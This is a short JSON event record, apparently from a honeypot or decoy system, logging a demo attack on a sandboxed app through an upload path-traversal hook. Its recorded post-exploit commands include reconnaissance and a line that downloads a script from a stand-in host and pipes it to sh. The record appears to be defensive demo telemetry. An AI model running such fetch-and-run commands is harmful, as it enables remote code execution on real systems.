{
  "event_id": "atk-demo-03",
  "ts": 1792285329400,
  "decoy_id": "dcy-demo-1",
  "catalogue_id": "foiled/demo-app/1.0.0",
  "decoy_kind": "sandbox",
  "channel": "hook",
  "severity": "critical",
  "src": { "ip": "203.0.113.7", "port": 51240 },
  "attempt_id": "atm-demo-1",
  "hook": {
    "hook_id": "demo-app.upload-path-traversal",
    "catalogue_id": "foiled/demo-app/1.0.0",
    "cve_id": "FOILED-DEMO-0001",
    "stage": "post_exploit",
    "sequence_no": 2,
    "t_offset_ms": 6400,
    "cmd_lines": [
      "id",
      "uname -a",
      "ls -la /srv/demo-app",
      "sh -c 'curl -fsSL http://stage2.example.invalid/x.sh | sh'"
    ]
  }
}
